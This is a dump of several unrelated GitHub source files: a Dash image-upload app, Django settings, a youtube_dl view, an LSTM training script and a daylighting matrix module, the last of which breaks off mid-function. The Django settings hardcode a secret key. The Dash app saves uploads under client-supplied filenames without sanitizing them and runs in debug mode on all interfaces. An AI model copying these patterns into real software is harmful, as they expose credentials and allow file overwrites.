\nexternal_stylesheets = [\n 'https://codepen.io/chriddyp/pen/bWLwgP.css',\n './center.css'\n]\n\n# Normally, Dash creates its own Flask server internally. By creating our own,\n# we can create a route for downloading files directly:\nserver = Flask(__name__, static_folder='/data/images') # use mienheld instead\napp = dash.Dash(server=server, external_stylesheets=external_stylesheets)\n\n\ncolors = {\n \"graphBackground\": \"#F5F5F5\",\n \"background\": \"#ffffff\",\n \"text\": \"#000000\"\n}\n\n\napp.layout = html.Div([\n html.H1(\"ULTRA ADVANCED CAT V.S. 
DOG IDENTIFIER.\"),\n html.H2(\"Patent Pending.\"),\n dcc.Upload(\n id='upload-data',\n children=html.Div([\n 'Drag and Drop images of cats or dogs, or ',\n html.A('Select Files')\n ]),\n style={\n 'width': '100%',\n 'height': '60px',\n 'lineHeight': '60px',\n 'borderWidth': '1px',\n 'borderStyle': 'dashed',\n 'borderRadius': '5px',\n 'textAlign': 'center',\n 'margin': '10px'\n },\n # Allow multiple files to be uploaded\n multiple=True\n ),\n html.H2(\"Files\"),\n dcc.Store(id='files-db', storage_type='session'),\n html.Ul(id=\"file-list\"),\n dcc.Graph(id='cats-dogs'),\n html.Div(id='output-data-upload')\n], style={'max-width': '1000px', 'margin' : '0 auto'})\n\n\n@server.route(\"/data/images/\")\ndef download(filename):\n \"\"\"Serve a file from the upload directory.\"\"\"\n return send_from_directory(directory='/data/images', filename=filename)\n #return send_from_directory(directory='/data/images', filename=filename, as_attachment=True)\n\ndef save_file(name, content):\n \"\"\"Decode and store a file uploaded with Plotly Dash.\"\"\"\n data = content.encode(\"utf8\").split(b\";base64,\")[1]\n with open(os.path.join(IMAGES_DIRECTORY, name), \"wb\") as fp:\n fp.write(base64.decodebytes(data))\n\ndef uploaded_files():\n \"\"\"List the files in the upload directory.\"\"\"\n files = []\n for filename in os.listdir(IMAGES_DIRECTORY):\n path = os.path.join(IMAGES_DIRECTORY, filename)\n if os.path.isfile(path):\n files.append(filename)\n return files\n\n\ndef file_download_link(filename, label):\n \"\"\"Create a Plotly Dash 'A' element that downloads a file from the app.\"\"\"\n location = \"{}/{}\".format(IMAGES_DIRECTORY, urlquote(filename))\n return html.A(label + ' - ' + filename, href=location, target=\"_blank\")\n\n\n@app.callback(\n Output(\"files-db\", \"data\"),\n [Input(\"upload-data\", \"filename\"), Input(\"upload-data\", \"contents\")],\n [State('files-db', 'data')]\n)\ndef update_db_disk(uploaded_filenames, uploaded_file_contents, data):\n \"\"\"Save uploaded files and regenerate the file list.\"\"\"\n\n if data is None:\n data = {}\n \n if not uploaded_filenames is None and not uploaded_file_contents is None:\n files = zip(uploaded_filenames, uploaded_file_contents)\n else:\n files = []\n \n messages = [\n {\"filename\" : name, \"image\" : str(data) }\n for name, data in files\n ]\n\n for m in messages:\n save_file(m['filename'], m['image'])\n\n api_calls = [\n requests.post(url=\"http://mlapi:8000/guess\", json=m)\n for m in messages\n ]\n\n with open('/errors', 'w') as f:\n for c in api_calls:\n if c.status_code == 200:\n f.write(str(c) + '\\n')\n\n labels = [\n call.json() if call.status_code == 200 else None\n for call in api_calls\n ]\n\n \n labels = list(filter(None, labels))\n\n for d in labels:\n data[d['filename']] = d['label']\n \n return data\n\n\n@app.callback(\n Output(\"file-list\", \"children\"),\n [Input(\"files-db\", \"data\")],\n)\ndef update_list(labels):\n \"\"\" File list. \"\"\"\n\n if labels is None or len(labels) == 0:\n return [html.Li(\"No files yet!\")]\n else:\n return [\n html.Li( file_download_link(f, labels[f]) )\n for f in labels\n ]\n\n\n@app.callback(\n Output(\"cats-dogs\", \"figure\"),\n [Input(\"files-db\", \"data\")],\n)\ndef update_graph(labels):\n \"\"\" Histogram of current files \"\"\"\n if labels is None:\n labels = {}\n \n\n hist = go.Histogram(\n x = list(labels.values()),\n marker = {'colorscale': 'Viridis'},\n name = 'Cats v.s. Dogs'\n )\n\n return {\n 'data': [hist],\n 'layout': go.Layout(title='Cats v.s. 
Dogs'),\n }\n\n \n \n\nif __name__ == \"__main__\":\n app.run_server(debug=True, host=\"0.0.0.0\", port=8888)\n","repo_name":"blairdrummond/docker-workshop","sub_path":"dash/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1705130452","text":"import os\n\nimport dj_database_url\nimport environ\n\nenv = environ.Env(DEBUG=(bool, False))\nsite_root = environ.Path(__file__) - 2\nif os.path.exists(site_root(\"meetenjoy\", \".env\")):\n environ.Env.read_env()\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nSECRET_KEY = 'zc9j11-&pu=&k*zlbo5kel6ua&=r+#oij$ao!yle1v@0o6jnyn'\n\nDEBUG = env(\"DEBUG\", default=False)\n\nUSE_SWAGGER = env.bool(\"USE_SWAGGER\", default=True)\nUSE_SEARCH = env.bool(\"USE_SEARCH\", default=False)\nFIRST_SERVICE_URL = env.str(\"FIRST_SERVICE_URL\", default=\"\")\nSECOND_SERVICE_URL = env.str(\"SECOND_SERVICE_URL\", default=\"\")\nTHIRD_SERVICE_URL = env.str(\"THIRD_SERVICE_URL\", default=\"\")\nFIRST_SERVICE_RETRIES = env.int(\"FIRST_SERVICE_RETRIES\", default=1)\nSECOND_SERVICE_RETRIES = env.int(\"SECOND_SERVICE_RETRIES\", default=1)\nTHIRD_SERVICE_RETRIES = env.int(\"THIRD_SERVICE_RETRIES\", default=1)\nCACHE_EXPIRES = env.int(\"CACHE_EXPIRES\", default=60 * 5) # seconds\n\nALLOWED_HOSTS = [\n \"meetenjoy.herokuapp.com\",\n \"localhost\",\n \"127.0.0.1\",\n]\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n\n 'rest_framework',\n 'rest_framework.authtoken',\n 'rest_auth',\n 'rest_auth.registration',\n \"drf_yasg\",\n \"rest_framework_swagger\",\n 'allauth',\n 'allauth.account',\n 'django_extensions',\n 'django_filters',\n\n 'accounts',\n 'aggregator',\n 'meetings',\n 'notifications',\n]\n\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n\nSITE_ID = 1\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'meetenjoy.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'meetenjoy.wsgi.application'\nDATABASES = {\n 'default': dj_database_url.config(default=env.str(\"DATABASE_URL\"))\n}\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\nREST_FRAMEWORK = {\n 'DEFAULT_AUTHENTICATION_CLASSES': [\n 
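# DRF token authentication: API clients authenticate with an 'Authorization: Token ...' header\n 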
'rest_framework.authentication.TokenAuthentication',\n ],\n 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',\n 'PAGE_SIZE': 100,\n 'DEFAULT_FILTER_BACKENDS': ['django_filters.rest_framework.DjangoFilterBackend']\n}\n\nSTATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles/')\nSTATIC_URL = \"/static/\"\n\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media/')\nMEDIA_URL = '/media/'\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nAUTH_USER_MODEL = 'accounts.User'\n\nDOU_LOAD_CRONTAB = env.dict(\"DOU_LOAD_CRONTAB\", default={\"hour\": 6, \"minute\": 1})\nDOU_MEETUP_CRONTAB = env.dict(\"DOU_MEETUP_CRONTAB\", default={\"hour\": 6, \"minute\": 1})\nUPDATE_MEETING_STATUSES_CRONTAB = env.dict(\"UPDATE_MEETING_STATUSES_CRONTAB\", default={\"minute\": 30})\n\n# REDIS_HOST = env.str(\"REDIS_HOST\", default=\"redis\")\n# REDIS_PORT = env.int(\"REDIS_PORT\", default=6379)\n\n# CELERY_RESULT_BACKEND = CELERY_BROKER_URL = \"redis://{host}:{port}/0\".format(\n# host=REDIS_HOST, port=REDIS_PORT\n# )\n","repo_name":"InvisibleTraveler/KPI-meetup-mob-proj-b","sub_path":"meetenjoy/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27066291806","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom django.views.generic.base import TemplateResponseMixin, View\nimport youtube_dl\n\nfrom core.constants import itag_to_format\n\ndef convert_bytes(size):\n if not size:\n return 0\n for x in ['bytes', 'KB', 'MB', 'GB', 'TB']:\n if size < 1024.0:\n return \"%3.1f %s\" % (size, x)\n size /= 1024.0\n\n return size\n\nclass HomeView(View, TemplateResponseMixin):\n template_name = 'home.html'\n\n def get_video_context(self, url):\n ydl_opts = {}\n result = None\n audio_formats = []\n video_formats = []\n audio_video_formats = []\n not_valid_format = []\n\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n result = ydl.extract_info(url, download=False)\n for frmt in result['formats']:\n frmt['h_size'] = convert_bytes(frmt['filesize'])\n # format_id = frmt['format_id']\n # format = itag_to_format.get(format_id, None)\n # if not format:\n # not_valid_format.append(frmt)\n if frmt['vcodec'] != 'none' and frmt['acodec'] != 'none':\n audio_video_formats.append(frmt)\n elif frmt['acodec'] != 'none':\n audio_formats.append(frmt)\n elif frmt['vcodec'] != 'none':\n video_formats.append(frmt)\n\n context = {\n \"result\": result,\n \"url\": url,\n \"audio_formats\": audio_formats,\n \"video_formats\": video_formats,\n \"audio_video_formats\": audio_video_formats\n }\n return context\n\n def get(self, request):\n context = {}\n url = request.GET.get('youtube_url', None)\n if url:\n context = self.get_video_context(url)\n return self.render_to_response(context)\n","repo_name":"shourav9884/youtube_dl_django","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"18781172439","text":"from unicodedata import bidirectional\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom torch.autograd import Variable\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\nclass LSTM(nn.Module):\n def __init__(self, input_size, hidden_size, 
num_layers):\n super(LSTM, self).__init__()\n\n self.num_layers = num_layers\n self.input_size = input_size\n self.hidden_size = hidden_size\n\n self.lstm = nn.LSTM(input_size=input_size, hidden_size=hidden_size,\n num_layers=num_layers, batch_first=True) #lstm\n self.fc_1 = nn.Linear(hidden_size, 128)\n self.fc = nn.Linear(128, input_size)\n self.relu = nn.ReLU()\n\n def forward(self, x):\n h_0 = Variable(torch.zeros(self.num_layers, x.size(0), self.hidden_size)).to(device) #hidden state\n c_0 = Variable(torch.zeros(self.num_layers, x.size(0), self.hidden_size)).to(device) #internal state\n # Propagate input through LSTM\n output, (hn, cn) = self.lstm(x, (h_0, c_0)) #lstm with input, hidden, and internal state\n hn = hn.view(-1, self.hidden_size) #reshaping the data for Dense layer next\n out = self.relu(hn)\n out = self.fc_1(out) #first Dense\n out = self.relu(out) #relu\n out = self.fc(out) #Final Output\n return out\n\ntrain_set = np.load('train.npy', allow_pickle=True)\nval_set = np.load('val.npy', allow_pickle=True)\nprint(np.shape(train_set))\n\ntraining_targets = []\ntraining_inputs = []\nend_token = np.zeros((1, 20))\n\nbatch_size = 256\nmax_seq_len = 100\nbatch_targets = []\nbatch_inputs = []\n# quick way to implement batches, should do this better\nfor i in range(len(train_set)):\n\n # create the batches and convert to tensors\n if i % batch_size == 0 and i != 0:\n training_targets.append(torch.cat(batch_targets, dim=0))\n training_inputs.append(batch_inputs)\n # reset\n batch_targets = []\n batch_inputs = []\n\n # Get the one hot of the second to last character (before end character)\n one_hot_target = torch.Tensor(np.array(train_set[i][-2]))\n # Get it in the form of an index for cross entropy\n batch_targets.append((one_hot_target == 1).nonzero(as_tuple=True)[0])\n # Remove the last two characters\n cur_sequence = np.array(train_set[i][:-2])\n # Get up to max_seq_len elements from the end of the sequence\n if len(cur_sequence) > max_seq_len:\n cur_sequence = cur_sequence[-max_seq_len:]\n # concatenate the remaining sequence with the end token\n if len(cur_sequence) == 0:\n cur_sequence = np.copy(end_token)\n else:\n cur_sequence = np.concatenate((cur_sequence, end_token), axis=0)\n\n # append to batch list\n batch_inputs.append(cur_sequence)\n\n# Standard training components\nmodel = LSTM(20, 60, 4).to(device)\nlr = .001\nepochs = 100\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.Adam(model.parameters(), lr=lr)\n\nfor epoch in range(epochs):\n # keep track of epoch loss\n running_loss = 0\n correct = 0\n for sequences, targets in zip(training_inputs, training_targets):\n # Pad batch\n for i, sequence in enumerate(sequences):\n if len(sequence) < max_seq_len + 1:\n pads = np.zeros((max_seq_len - sequence.shape[0] + 1, sequence.shape[1]))\n sequences[i] = np.concatenate((pads, sequence), axis=0)\n sequences = torch.Tensor(np.array(sequences))\n\n # Move data to devices\n sequences, targets = sequences.to(device), targets.to(device)\n\n optimizer.zero_grad()\n predictions = model(sequences)\n # Get the final hidden state for the batch, should be the last 256\n predictions = predictions[-256:]\n loss = criterion(predictions, targets)\n\n # Getting predictions and training accuracy\n preds = predictions.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n correct += preds.eq(targets.view_as(preds)).sum().item()\n\n # keep track of loss\n running_loss += loss.item()\n # Update parameters\n loss.backward()\n optimizer.step()\n\n running_loss /= 
len(training_inputs)\n print(\"Epoch {} training loss: {}, Training acc: {}\".format(epoch, running_loss, 100 * correct / (len(training_inputs)*256)))\n","repo_name":"JohnLazzari/LSTM-Amino-Acids","sub_path":"LSTM.py","file_name":"LSTM.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31369100136","text":"#!/usr/bin/env python\n\"\"\"\nThis module contains functionalities relating to generating matrices for\nnon-coplanar shading systems\n\"\"\"\n\nfrom dataclasses import dataclass\nimport logging\nimport math\nimport os\nfrom pathlib import Path\nimport subprocess as sp\nimport tempfile as tf\nfrom typing import List\nfrom typing import Optional\nfrom typing import Sequence\n\nimport pyradiance as pr\nfrom frads import matrix\nfrom frads import geom\n\n# from frads.types import Primitive\n# from frads.types import NcpModel\nfrom frads import utils\nimport numpy as np\n\nlogger: logging.Logger = logging.getLogger(\"frads.mfacade\")\n\n\n@dataclass\nclass NcpModel:\n \"\"\"Non-coplanar data model.\"\"\"\n\n windows: Sequence[pr.Primitive]\n ports: List[pr.Primitive]\n env: List[Path]\n sbasis: str\n rbasis: str\n\n\ndef ncp_compute_back(\n model: NcpModel, src: dict, opt: Optional[List[str]] = None, refl: bool = False\n) -> None:\n \"\"\"compute front side calculation(backwards).\"\"\"\n logger.info(\"Computing for front side\")\n for idx, wp in enumerate(model.windows):\n logger.info(\"Front transmission for window %s\", idx)\n front_rcvr = matrix.SurfaceReceiver(\n surfaces=model.ports,\n basis=model.rbasis,\n left_hand=True,\n offset=None,\n source=\"glow\",\n out=src[f\"tb{idx}\"],\n )\n # sndr_prim = utils.polygon2prim(wplg, 'fsender', f'window{idx}')\n sndr = matrix.SurfaceSender(\n surfaces=[wp], basis=model.sbasis, left_hand=True, offset=None\n )\n if refl:\n logger.info(\"Front reflection for window %s\", idx)\n wflip = utils.parse_polygon(wp).flip()\n wflip_prim = utils.polygon2prim(wflip, \"breceiver\", f\"window{idx}\")\n back_rcvr = matrix.SurfaceReceiver(\n surfaces=[wflip_prim],\n basis=\"-\" + model.rbasis,\n left_hand=False,\n offset=None,\n source=\"glow\",\n out=src[f\"rb{idx}\"],\n )\n front_rcvr += back_rcvr\n matrix.rfluxmtx(sender=sndr, receiver=front_rcvr, env=model.env, opt=opt)\n\n\ndef ncp_compute_front(model: NcpModel, src_dict, opt, refl: bool = False) -> None:\n \"\"\"compute back side calculation.\"\"\"\n sndr_prim = []\n for p in model.ports:\n np = pr.Primitive(\n p.modifier,\n p.ptype,\n p.identifier,\n p.str_arg,\n geom.parse_polygon(p.real_arg).flip().to_real(),\n )\n sndr_prim.append(np)\n sndr = matrix.surface_as_sender(\n prim_list=sndr_prim, basis=\"-\" + model.rbasis, offset=None, left=False\n )\n logger.info(\"Computing for back side\")\n for idx, wp in enumerate(model.windows):\n logger.info(\"Back transmission for window %s\", idx)\n wplg = geom.parse_polygon(wp.real_arg).flip()\n rcvr_prim = utils.polygon2prim(wplg, \"breceiver\", f\"window{idx}\")\n rcvr = matrix.surface_as_receiver(\n prim_list=[rcvr_prim],\n basis=\"-\" + model.sbasis,\n left=False,\n offset=None,\n source=\"glow\",\n out=src_dict[f\"tf{idx}\"],\n )\n if refl:\n logger.info(\"Back reflection for window %s\", idx)\n # brcvr_prim = [utils.polygon2prim(plg, \"freceiver\", \"window\" + str(i))\n # for i, pp in enumerate(model.ports)]\n brcvr = matrix.surface_as_receiver(\n prim_list=model.ports,\n basis=model.rbasis,\n left=False,\n offset=None,\n source=\"glow\",\n 
out=src_dict[f\"rf{idx}\"],\n )\n rcvr += brcvr\n matrix.rfluxmtx(sender=sndr, receiver=rcvr, env=model.env, opt=opt)\n\n\ndef klems_wrap(model, src_dict, fwrap_dict, out) -> None:\n \"\"\"prepare wrapping for Klems basis.\"\"\"\n for key in src_dict:\n for _, _ in enumerate(model.windows):\n inp = src_dict[key]\n rcmd = [\"rmtxop\", \"-fa\", \"-t\", \"-c\", \".265\", \".67\", \".065\", inp]\n ps1 = sp.run(rcmd, check=True, stdout=sp.PIPE)\n with open(fwrap_dict[key], \"wb\") as wtr:\n sp.run([\"getinfo\", \"-\"], check=True, input=ps1.stdout, stdout=wtr)\n for i, _ in enumerate(model.windows):\n out_name = out.parent / (out.stem + f\"{i}.xml\")\n sub_dict = {k: fwrap_dict[k] for k in fwrap_dict if k.endswith(str(i))}\n cmd = [\"wrapBSDF\", \"-a\", model.rbasis, \"-c\"]\n for i, j in sub_dict.items():\n cmd.append(\"-\" + i[:2])\n cmd.append(str(j))\n logger.info(\"Calling wrapBSDF with:\\n%s\", \" \".join(cmd))\n with open(out_name, \"wb\") as wtr:\n sp.run(cmd, check=True, stdout=wtr)\n\n\n# def klems_wrap2(out, out2, inp, basis):\n# \"\"\"prepare wrapping for Klems basis.\"\"\"\n# cmd = f\"rmtxop -fa -t -c .265 .67 .065 {inp} | getinfo - > {out}\"\n# sp.run(cmd, shell=True)\n# basis_dict = {\"kq\": \"Klems Quarter\", \"kh\": \"Klems Half\", \"kf\": \"Klems Full\"}\n# coeff = utils.angle_basis_coeff(basis_dict[basis])\n# with open(out, \"r\") as rdr:\n# rows = [map(float, l.split()) for l in rdr.readlines()]\n# res = [[str(val / c) for val in row] for row, c in zip(rows, coeff)]\n# with open(out2, \"w\") as wtr:\n# [wtr.write(\"\\t\".join(row) + \"\\n\") for row in res]\n\n\ndef rttree_reduce(\n ttrank, ttlog2, pctcull, refl, src: str, dest, spec: str = \"Visible\"\n) -> None:\n \"\"\"call rttree_reduce to reduce shirley-chiu to tensor tree.\n translated from genBSDF.pl.\n \"\"\"\n CIEuv = (\n \"Xi=.5141*Ri+.3239*Gi+.1620*Bi;Yi=.2651*Ri+.6701*Gi+.0648*Bi;\"\n \"Zi=.0241*Ri+.1229*Gi+.8530*Bi;den=Xi+15*Yi+3*Zi;\"\n \"uprime=if(Yi,4*Xi/den,4/19);vprime=if(Yi,9*Yi/den,9/19);\"\n )\n\n ns2 = int((2**ttlog2) ** 2)\n if spec == \"Visible\":\n cmd = [\n \"rcalc\",\n \"-e\",\n f\"Omega:PI/{ns2}\",\n \"-e\",\n \"Ri=$1;Gi=$2;Bi=$3\",\n \"-e\",\n CIEuv,\n \"-e\",\n \"$1=Yi/Omega\",\n ]\n elif spec == \"CIE-u\":\n cmd = [\"rcalc\", \"-e\", \"Ri=$1;Gi=$2;Bi=$3\", \"-e\", CIEuv, \"-e\", \"$1=uprime\"]\n elif spec == \"CIE-v\":\n cmd = [\"rcalc\", \"-e\", \"Ri=$1;Gi=$2;Bi=$3\", \"-e\", CIEuv, \"-e\", \"$1=vprime\"]\n\n if os.name == \"posix\":\n cmd.insert(1, \"-if3\")\n if pctcull >= 0:\n avg = \"-a\" if refl else \"\"\n pcull = pctcull if spec == \"Visible\" else (100 - (100 - pctcull) * 0.25)\n rtcmd = [\n \"rttree_reduce\",\n avg,\n \"-h\",\n \"-ff\",\n \"-t\",\n pcull,\n \"-r\",\n ttrank,\n \"-g\",\n ttlog2,\n ]\n if os.name == \"posix\":\n cmd.extend([\"-of\", src])\n ps1 = sp.run(cmd + [\"-of\", src], check=True, stdout=sp.PIPE)\n with open(dest, \"wb\") as wtr:\n ps2 = sp.run(rtcmd, check=True, input=ps1.stdout, stdout=wtr)\n else:\n ps1 = sp.run(\n [\"rcollate\", \"-ho\", \"-oc\", \"1\", src], check=True, stdout=sp.PIPE\n )\n ps2 = sp.run(cmd, check=True, input=ps1.stdout, stdout=sp.PIPE)\n with open(dest, \"wb\") as wtr:\n sp.run(rtcmd, check=True, input=ps2.stdout, stdout=wtr)\n else:\n if os.name == \"posix\":\n with open(dest, \"wb\") as wtr:\n sp.run(cmd.append(src), check=True, stdout=wtr)\n else:\n ps1 = sp.run(\n [\"rcollate\", \"-ho\", \"-oc\", \"1\", src], check=True, stdout=sp.PIPE\n )\n with open(dest, \"wb\") as wtr:\n sp.run(cmd, check=True, input=ps1.stdout, stdout=wtr)\n\n\ndef 
tt_wrap(model, src_dict, fwrap_dict, out, refl) -> None:\n \"\"\"call wrapBSDF to wrap a XML file.\"\"\"\n sc = int(model.rbasis[2:])\n ttlog2 = math.log(sc, 2)\n assert ttlog2 % int(ttlog2) == 0\n ttrank = 4 # only anisotropic\n pctcull = 90\n ttlog2 = int(ttlog2)\n for i, _ in enumerate(model.windows):\n sub_key = [k for k in src_dict if k.endswith(str(i))]\n sub_dict = {k: fwrap_dict[k] for k in sub_key}\n for key in sub_key:\n rttree_reduce(ttrank, ttlog2, pctcull, refl, src_dict[key], fwrap_dict[key])\n cmd = [\"wrapBSDF\", \"-a\", \"t4\", \"-s\", \"Visible\"]\n cmd += [\" \".join((\"-\" + i[:2], str(j))) for i, j in sub_dict.items()]\n cmd += f\"> {out}.xml\"\n with open(out, \"wb\") as wtr:\n sp.run(cmd, check=True, stdout=wtr)\n\n\ndef gen_ncp_mtx(\n model: NcpModel,\n out: Path,\n opt: Optional[List[str]] = None,\n refl: bool = False,\n forw: bool = False,\n wrap: bool = True,\n # solar=False,\n) -> None:\n \"\"\"Generate a set of non-coplanar shading matrices.\"\"\"\n\n # Collect all the primitives\n # all_prims = []\n # for path in model.env:\n # all_prims.extend(utils.unpack_primitives(path))\n\n # # Find out the modifier of the ncp polygon\n # ncp_mod = [prim.modifier for prim in ncp_prims if prim.ptype == \"polygon\"][0]\n\n # # Find out the ncp material primitive\n # ncp_mat: Primitive\n # ncp_type: str = \"\"\n # for prim in all_prims:\n # if prim.identifier == ncp_mod:\n # ncp_mat = prim\n # ncp_type = prim.ptype\n # break\n # if ncp_type == \"\":\n # raise ValueError(\"Unknown NCP material\")\n\n # dirname = out.parent\n # if solar and ncp_type == \"BSDF\":\n # logger.info(\"Computing for solar and visible spectrum...\")\n # xmlpath = ncp_mat.str_arg.split()[2]\n # td = tf.mkdtemp()\n # with open(xmlpath) as rdr:\n # raw = rdr.read()\n # raw = raw.replace(\n # 'Visible',\n # 'Visible2',\n # )\n # raw = raw.replace(\n # 'Solar',\n # 'Visible',\n # )\n # raw = raw.replace(\n # 'Visible2',\n # 'Solar',\n # )\n # solar_xml_path = os.path.join(td, \"solar.xml\")\n # with open(solar_xml_path, \"w\") as wtr:\n # wtr.write(raw)\n # _strarg = ncp_mat.str_arg.split()\n # _strarg[2] = solar_xml_path\n # solar_ncp_mat = Primitive(\n # ncp_mat.modifier,\n # ncp_mat.ptype,\n # ncp_mat.identifier + \".solar\",\n # \" \".join(_strarg),\n # \"0\",\n # )\n\n # _env_path = os.path.join(td, \"env_solar.rad\")\n # with open(_env_path, \"w\") as wtr:\n # for prim in all_prims:\n # wtr.write(str(prim))\n # outsolar = dirname / (\"_solar_{out.stem}.dat\")\n\n klems = True\n if wrap and (model.rbasis.startswith(\"sc\")) and (model.sbasis.startswith(\"sc\")):\n klems = False\n sc = int(model.rbasis[2:])\n ttlog2 = math.log(sc, 2)\n if ttlog2 % int(ttlog2) != 0:\n raise ValueError(\"Invalid tensor tree resolution.\")\n if opt is not None:\n opt.append(\"-hd\")\n opt.append(\"-ff\")\n with tf.TemporaryDirectory() as td:\n src_dict = {}\n fwrap_dict = {}\n for idx, _ in enumerate(model.windows):\n _tf = f\"tf{idx}\"\n _rf = f\"rf{idx}\"\n _tb = f\"tb{idx}\"\n _rb = f\"rb{idx}\"\n src_dict[_tb] = Path(td, _tb + \".dat\")\n fwrap_dict[_tb] = Path(td, _tb + \"p.dat\")\n if forw:\n src_dict[_tf] = Path(td, _tf + \".dat\")\n fwrap_dict[_tf] = Path(td, _tf + \"p.dat\")\n if refl:\n src_dict[_rb] = Path(td, _rb + \".dat\")\n fwrap_dict[_rb] = Path(td, _rb + \"p.dat\")\n if forw:\n src_dict[_rf] = Path(td, _rf + \".dat\")\n fwrap_dict[_rf] = Path(td, _rf + \"p.dat\")\n ncp_compute_back(model, src_dict, opt, refl=refl)\n if forw:\n ncp_compute_front(model, src_dict, opt, refl=refl)\n if wrap:\n if klems:\n 
klems_wrap(model, src_dict, fwrap_dict, out)\n else:\n tt_wrap(model, src_dict, fwrap_dict, out, refl)\n else:\n for key, file in src_dict.items():\n out_name = f\"{out.stem}_{key}.mtx\"\n file.rename(out.parent / out_name)\n\n # if solar and ncp_type == \"BSDF\":\n # # process_thread.join()\n # vis_dict = {}\n # sol_dict = {}\n # oname = out.stem\n # mtxs = [\n # os.path.join(dirname, mtx)\n # for mtx in os.listdir(dirname)\n # if mtx.endswith(\".mtx\")\n # ]\n # for mtx in mtxs:\n # _direc = Path(mtx).stem.split(\"_\")[-1][:2]\n # mtxname = Path(mtx).stem\n # if mtxname.startswith(oname):\n # # vis_dict[_direc] = os.path.join(dirname, f\"_vis_{_direc}\")\n # vis_dict[_direc] = os.path.join(td, f\"vis_{_direc}\")\n # out2 = os.path.join(dirname, f\"vis_{_direc}\")\n # klems_wrap(vis_dict[_direc], out2, mtx, args.ss)\n # if mtxname.startswith(\"_solar_\"):\n # sol_dict[_direc] = os.path.join(td, f\"sol_{_direc}\")\n # out2 = os.path.join(dirname, f\"sol_{_direc}\")\n # klems_wrap(sol_dict[_direc], out2, mtx, args.ss)\n # cmd = f\"wrapBSDF -a {args.ss} -c -s Visible \"\n # cmd += \" \".join([f\"-{key} {vis_dict[key]}\" for key in vis_dict])\n # cmd += \" -s Solar \"\n # cmd += \" \".join([f\"-{key} {sol_dict[key]}\" for key in sol_dict])\n # cmd += f\" > {os.path.join(dirname, oname)}.xml\"\n # os.system(cmd)\n # shutil.rmtree(td)\n # [os.remove(mtx) for mtx in mtxs]\n\n\ndef gen_port_prims_from_window_ncp(\n wprim: Sequence[pr.Primitive], nprim: Sequence[pr.Primitive]\n) -> List[pr.Primitive]:\n \"\"\"Generate port primitives from window and non-coplanar shading primitives.\"\"\"\n if len(wprim) > 1:\n awprim = merge_windows(wprim)\n else:\n awprim = wprim[0]\n wplg = geom.parse_polygon(awprim.fargs)\n nplgs = [geom.parse_polygon(p.fargs) for p in nprim if p.ptype == \"polygon\"]\n all_ports = gen_ports_from_window_ncp(wplg, nplgs)\n port_prims = []\n for idx, plg in enumerate(all_ports):\n new_prim = utils.polygon2prim(plg, \"port\", f\"portf{idx+1}\")\n logger.debug(str(new_prim))\n port_prims.append(new_prim)\n return port_prims\n\n\ndef gen_port_prims_from_window(\n wprim: Sequence[pr.Primitive], depth: float, scale_factor: float\n) -> List[pr.Primitive]:\n \"\"\"Generate port primitives from window primitives, depth, and scale factor.\"\"\"\n if len(wprim) > 1:\n awprim = merge_windows(wprim)\n else:\n awprim = wprim[0]\n wpoly = geom.parse_polygon(awprim.fargs)\n extrude_vector = wpoly.normal.reverse().scale(depth)\n scale_vector = geom.Vector(scale_factor, scale_factor, scale_factor)\n scaled_window = wpoly.scale(scale_vector, wpoly.centroid)\n all_ports = scaled_window.extrude(extrude_vector)[1:]\n port_prims = []\n for idx, plg in enumerate(all_ports):\n new_prim = utils.polygon2prim(plg, \"port\", f\"portf{idx+1}\")\n logger.debug(str(new_prim))\n 